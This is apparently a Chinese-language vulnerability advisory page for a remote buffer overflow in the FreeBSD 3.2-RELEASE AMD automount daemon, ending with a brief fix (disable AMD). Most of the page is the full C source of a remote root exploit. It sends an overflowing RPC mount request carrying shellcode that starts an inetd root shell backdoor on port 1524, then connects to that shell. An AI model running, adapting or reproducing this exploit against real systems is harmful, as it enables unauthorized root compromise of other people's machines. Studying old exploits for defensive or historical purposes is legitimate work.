FreeBSD AMD远程溢出(old)
涉及程序:
FreeBSD AMD
描述:
FreeBSD 3.2-REL AMD存在溢出允许远程获取root
详细:
下面是这个远程溢出的攻击测试代码,另外还需要一个头文件。
程序只允许用于研究用途,非法使用者后果自负!
研究者请不要随意散播!
请下载代码包: rpc_AMD_FreeBSD3_2REL.tar.gz
/*
* $Id$
*
* fbsd_amd.c
* fbsd_amd.c -- FreeBSD 3.2-REL AMD remote root exploit
*
* Copyright (c) 1999 anathema <anathema@box.co.uk>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include "amd-incl.h"
#define ADDR 0xbfbfd2a4 /* FreeBSD 3.2-REL */
#define RETPOS 1005
#define AMD_PROG 300019
#define AMD_VERS 1
char c0de[] =
"\xeb\x3d\x9a\x24\x24\x24\x24\x07\x24\xc3\x5e\x29\xc0\x89\x46\xbf\x88\x46\xc4"
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56\x8d\x5e\x10"
"\x89\x1e\x53\x8d\x5e\x18\x89\x5e\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xc6"
"\xff\xff\xff\xff\xff\xff\xe8\xc6\xff\xff\xff\x01\x01\x01\x01\x02\x02\x02\x02"
"\x03\x03\x03\x03\x04\x04\x04\x04"
"\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/x;"
"/usr/sbin/inetd /tmp/x; /bin/rm -f /tmp/x";
u_long
resolve_host(u_char *host)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host)) == -1)
{
host_ent = gethostbyname(host);
if (!host_ent) return((u_long)0);
memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void
shellz(u_long dst_ip)
{
struct sockaddr_in sin;
u_char sock_buf[8192];
fd_set fds;
int sock;
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock == -1)
{
perror("socket allocation");
exit(-1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(1524); /* ingreslock */
sin.sin_addr.s_addr = dst_ip;
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1)
{
perror("connecting to backdoor");
exit(-1);
}
fprintf(stderr, "\nHost `%s` successfully owned.\n",
inet_ntoa(sin.sin_addr));
for (;;)
{
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
select(255, &fds, NULL, NULL, NULL);
memset(sock_buf, 0, sizeof(sock_buf));
if (FD_ISSET(sock, &fds))
{
read(sock, sock_buf, sizeof(sock_buf));
fprintf(stderr, "%s", sock_buf);
}
if (FD_ISSET(0, &fds))
{
read(0, sock_buf, sizeof(sock_buf));
write(sock, sock_buf, strlen(sock_buf));
}
}
/* NOTREACHED */
}
u_char *
overflow_buf(void)
{
u_char buf[2048] = {0};
u_long addr = ADDR;
int ret = RETPOS;
memset(buf, 0x90, ret - strlen(c0de));
memcpy(buf + ret - strlen(c0de), c0de, strlen(c0de));
buf[ret++] = (addr & 0xff);
buf[ret++] = (addr >> 8) & 0xff;
buf[ret++] = (addr >> 16) & 0xff;
buf[ret++] = (addr >> 24) & 0xff;
return(strdup(buf));
}
void
exploit(u_long dst_ip)
{
struct sockaddr_in sin;
CLIENT *clnt;
u_char buf[4096] = {0};
u_char *ptr = buf;
int sock = RPC_ANYSOCK;
strncpy(buf, overflow_buf(), sizeof(buf));
sin.sin_family = AF_INET;
sin.sin_port = 0;
sin.sin_addr.s_addr = dst_ip;
clnt = clnttcp_create(&sin, AMD_PROG, AMD_VERS, &sock, 0, 0);
if (!clnt)
{
clnt_pcreateerror("clntudp_create");
exit(-1);
}
fprintf(stderr, "\nIt's time to w8.. \n");
amqproc_mount_1(&ptr, clnt);
sleep(2);
clnt_destroy(clnt);
shellz(dst_ip);
}
void
usage(u_char *argv0)
{
fprintf(stderr, "usage:\t%s dst_host|ip\n", argv0);
exit(0);
}
int
main(int argc, char **argv)
{
struct in_addr i_addr;
u_long dst_ip = 0;
fprintf(stderr, "AMD exploit for FreeBSD 3.X <anathema@box.co.uk>\n"
"Tested against FreeBSD 3.2-REL stock AMD binary.\n\n");
if (argc != 2)
{
usage(argv[0]);
/* NOTREACHED */
}
dst_ip = resolve_host(argv[1]);
if (!dst_ip)
{
fprintf(stderr, "What kind of address is this: `%s`?\n", argv[1]);
exit(-1);
}
i_addr.s_addr = dst_ip;
fprintf(stderr, "target : %s\n", inet_ntoa(i_addr));
fprintf(stderr, " addr : 0x%lx\n", ADDR);
exploit (dst_ip);
}
/* EOF */
解决办法:
关掉AMD守护程序
设为首页 
加入收藏 
联系我们 繁體中文 
